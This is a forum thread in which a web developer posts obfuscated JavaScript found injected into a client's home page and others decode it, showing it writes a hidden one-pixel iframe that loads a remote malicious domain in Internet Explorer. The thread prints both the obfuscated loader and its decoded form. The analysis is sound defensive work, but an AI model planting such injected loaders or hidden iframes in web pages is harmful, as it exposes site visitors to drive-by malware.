Hello,
I'm hoping someone might help us understand the code listed below.
One of our clients has been having unknown Javascript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.
The following code appears this week on their site:
<script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,25,32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46,52,18,42,0,49,29,60,50,11,36,13,48,35,15,10,55,34,56,37,57,21,39,0,0,0,0,3,0,2,30,61,14,31,1,62,19,7,58,16,54,9,45,5,17,6,47,59,24,40,38,28,4,43,53);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>
Has anyone seen this before? I did a quick search and it mentioned
something about it being an encryption technique.
Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.
Could the hosting company be compromised?
Any information or insight is much appreciated.
Cheers,
Ken
It looks to act upon a big old string of encoded material to produce
something written into the document.
It would help to know in what context this piece of script appeared.
drclue wrote:
> It looks to act upon a big old string of encoded material to produce
> something written into the document.
> It would help to know in what context this piece of script appeared.
The code was inserted into the body of the page, directly after the
<body> tag.
The page does not appear to have any text, other than what the client
has supplied, appearing on the page after it appears in the browser.
ke*********@gmail.com wrote:
> decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>
This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".
The decrypt function decodes this into the following JavaScript program
and inserts it into the web page.
<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
window.status="Done";
document.write('<IFRAME name="PageContainer"
src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1"
height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>
As you can see, the spyware targets only Microsoft Internet Explorer,
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php
Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007
The web server for this domain is presently down so what the iframe was
actually doing is an open question.
But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.
--------------------------------------------------------------------------- http://www.hunlock.com -- Permanently under construction (And proud of it!)
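
The decoding step described in the post above can be reproduced without letting the injected script run. The sketch below reimplements the table lookup and bit unpacking of decrypt_p() but returns the text instead of writing it into a page, then lists any iframes in the result. It is an added example, not code from the thread; findIframes, the placeholder host and the sample markup are assumptions made for illustration.

```javascript
// Added example (not from the thread): decode the payload without running it.
// Table copied from the injected decrypt_p(); index = charCode - 48.
const TABLE = [63,25,32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46,52,18,
  42,0,49,29,60,50,11,36,13,48,35,15,10,55,34,56,37,57,21,39,0,0,0,0,3,0,2,30,
  61,14,31,1,62,19,7,58,16,54,9,45,5,17,6,47,59,24,40,38,28,4,43,53];

// Same bit logic as decrypt_p(), but the text is returned, never written to a
// document. Each character carries 6 bits, packed low bits first; every
// completed byte is XORed with 165.
function decodePayload(encoded) {
  let w = 0, s = 0, out = '';
  for (const ch of encoded) {
    const v = TABLE[ch.charCodeAt(0) - 48];
    if (v === undefined) continue; // drop spaces/newlines added by mangled copies
    w |= v << s;
    if (s) {
      out += String.fromCharCode(165 ^ (w & 255));
      w >>= 8;
      s -= 2;
    } else {
      s = 6;
    }
  }
  return out;
}

// Hypothetical helper: list <iframe> tags in decoded markup and flag those
// whose width and height are both 1 or less, as in the decoded script above.
function findIframes(html) {
  const attr = (tag, name) => {
    const m = tag.match(new RegExp('\\b' + name + '\\s*=\\s*["\']?([^"\'\\s>]+)', 'i'));
    return m ? m[1] : null;
  };
  const tiny = (v) => v !== null && Number(v) <= 1;
  return [...html.matchAll(/<iframe\b[^>]*>/gi)].map(([tag]) => ({
    src: attr(tag, 'src'),
    hidden: tiny(attr(tag, 'width')) && tiny(attr(tag, 'height')),
  }));
}

// First 16 characters of the payload quoted in the thread, mangling space included.
const PAGE_PREFIX = 'rv BcveRszie7mhKL';
// Constructed sample markup; the host is a placeholder, not a value from the thread.
const SAMPLE_HTML = '<IFRAME name="c" src="http://placeholder.invalid/index.php" ' +
  'width="1" height="1" frameborder="0"></IFRAME>';

console.log(JSON.stringify(decodePayload(PAGE_PREFIX))); // "\n<SCRIPT lan"
console.log(findIframes(SAMPLE_HTML));
```

Four input characters yield three output bytes, so a copy of the payload truncated mid-group simply loses its last partial byte.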
pcx99 wrote:
> The web server for this domain is presently down so what the iframe was
> actually doing is an open question.
> But yes, you can assume that the effort to purge the computer of
> mal/adware was not 100% effective.
Wow, thank you.
Could I assume that this spyware is on the host's server?
We're developing on the Mac using Text & Dreamweaver. I've done a virus
scan and haven't found anything at all.
Many thanks for the insight.
Cheers,
Ken
More about it here: http://www.aboutus.org/Wsfgfdgrtyhgfd.net
On Nov 25, 6:42 pm, "Mr. Ken" <ken.robe...@gmail.com> wrote:
> pcx99 wrote:
> > The web server for this domain is presently down so what the iframe was
> > actually doing is an open question.
> > But yes, you can assume that the effort to purge the computer of
> > mal/adware was not 100% effective.
> Wow, thank you.
> Could I assume that this spyware is on the host's server?
> We're developing on the Mac using Text & Dreamweaver. I've done a virus
> scan and haven't found anything at all.
> Many thanks for the insight.
> Cheers,
> Ken